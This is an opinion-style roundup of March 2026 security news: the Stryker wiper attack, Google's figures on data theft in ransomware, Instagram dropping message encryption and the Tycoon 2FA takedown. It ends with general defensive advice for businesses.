March 2026: The Silent Breach.
The cybersecurity world, ever a landscape of shadows and sudden revelations, offered up a particularly potent brew of incidents this past March. Tony Anscombe, ESET’s Chief Security Evangelist, gave us his rundown, and frankly, it paints a picture far grimmer than corporate press releases usually allow. It’s not just about the ‘what’ anymore; it’s the increasingly sophisticated ‘how’ and the chilling ‘why’ that demands our attention.
Medtech Under Siege
Let’s start with Stryker. A medtech giant, a sector whose security failures can have immediate, tangible consequences for patient care, fell victim to a brazen cyberattack. The Iran-linked Handala hacktivist group claimed responsibility, and the reported damage is staggering: over 200,000 systems, servers, and mobile devices wiped clean, along with a staggering 50 terabytes of data exfiltrated. This isn’t just a financial hit; it’s a potential cascade of operational paralysis and a severe blow to patient trust. The sheer scale suggests a sophisticated operation, not a casual smash-and-grab, targeting critical infrastructure with chilling precision.
Data Theft: The New Ransomware Staple
But the Stryker incident is just one symptom of a much larger, more insidious trend. Google’s Threat Intelligence Group dropped a bombshell: suspected data theft was present in a whopping 77% of ransomware attacks in 2025. That’s a massive jump from the previous year’s 57%. This isn’t about locking files and demanding a ransom anymore; it’s about stealing your most sensitive information before encrypting your systems, creating a double bind and vastly increasing the use for attackers.
And here’s where it gets architectural: attackers are increasingly relying on built-in Windows utilities. Think PowerShell, WMI, bitsadmin – these are the tools administrators use every day to manage their networks. Attackers are learning to weaponize them, blending in with legitimate traffic and evading traditional signature-based defenses. This shift forces a re-evaluation of our defensive postures; it’s no longer enough to just block known malware. We need to detect anomalous behavior, scrutinize process execution, and understand the subtle ways legitimate tools can be subverted.
Research by the Google Threat Intelligence Group has found that suspected data theft was present in no fewer than 77% of ransomware attacks in 2025 (up from 57% the year prior) and that attackers are increasingly relying on built-in Windows utilities.
Instagram’s Encryption Reversal
Then there’s Instagram. Starting in May, they’re opting to stop encrypting private messages between users. Yes, you read that right. In an era where data privacy is becoming a non-negotiable demand from consumers, a major social media platform is choosing to weaken its own security posture. The ‘why’ here is murky, shrouded in the usual corporate vagueness about ‘user experience improvements’ and ‘content moderation.’ But let’s be clear: unencrypted messages are essentially plaintext, vulnerable to any party that can intercept them—be it malicious actors, or perhaps, even more unsettlingly, the platform itself for its own data mining purposes. This move is a significant step backward for digital communication security and sets a dangerous precedent. It begs the question: if a platform designed for communication can make such a regressive choice, what does that say about their underlying commitment to user safety?
Phishing Takedown
On a more positive note, a significant blow was dealt to the phishing ecosystem. A Europol-led operation dismantled the Tycoon 2FA phishing platform. This wasn’t a minor player; it was responsible for a colossal 62% of all phishing attempts blocked by Microsoft up to mid-2025. This platform specialized in tricking users into providing two-factor authentication (2FA) codes, a seemingly strong layer of security that, when compromised, becomes a direct conduit into accounts. The takedown highlights the ongoing international cooperation necessary to combat cybercrime, but it’s also a stark reminder of how sophisticated phishing has become. Attackers aren’t just sending generic emails; they’re building elaborate platforms designed to bypass increasingly sophisticated defenses, and this specific operation targeted one of the most pernicious attack vectors: the compromise of our supposed second line of defense.
The Underlying Architecture of Attack
What’s the common thread weaving through these disparate events? It’s an architectural shift in how attackers operate. They are moving beyond brute-force methods to exploit subtle vulnerabilities in systems and human psychology. They’re weaponizing legitimate tools, leveraging data exfiltration as a primary tactic, and targeting fundamental security assumptions like encryption and 2FA.
My unique insight here? We’re witnessing the commoditization of advanced persistent threats. What was once the domain of nation-state actors—sophisticated data exfiltration, custom toolkits leveraging built-in OS functions—is now accessible to a broader range of actors, from organized cybercrime groups to ideologically motivated hacktivists. This democratization of advanced attack techniques means the threat landscape isn’t just growing; it’s evolving at an accelerating pace, demanding a commensurate evolution in our defensive strategies. We need to move beyond perimeter defense and reactive patching, focusing instead on inherent security by design, continuous monitoring, and a deep understanding of potential attack paths within our own infrastructure.
What Businesses Should Be Doing
The lessons from March 2026 are clear: 1. Assume Breach, Prepare for Data Theft: Ransomware is no longer just about downtime. It’s about data exposure. Implement strong data loss prevention (DLP) strategies and ensure you can detect data exfiltration attempts. 2. Mind Your Own Tools: Audit the usage of administrative tools within your network. Look for anomalies, unauthorized execution, and unusual access patterns. 3. Prioritize End-to-End Encryption: Advocate for and implement strong encryption wherever possible, especially for sensitive communications. Question platforms that inexplicably weaken these protections. 4. Fortify 2FA, But Don’t Rely Solely On It: While crucial, 2FA can be bypassed. Implement additional behavioral analysis and anomaly detection to catch compromised credentials and tokens. 5. Stay Informed, Stay Vigilant: The threat landscape is a moving target. Continuous threat intelligence gathering and regular security posture assessments are not optional; they’re existential.
The fight for cybersecurity is a constant, often thankless, battle. March 2026 just provided another stark reminder of the stakes involved and the relentless ingenuity of those who seek to exploit our digital dependencies.
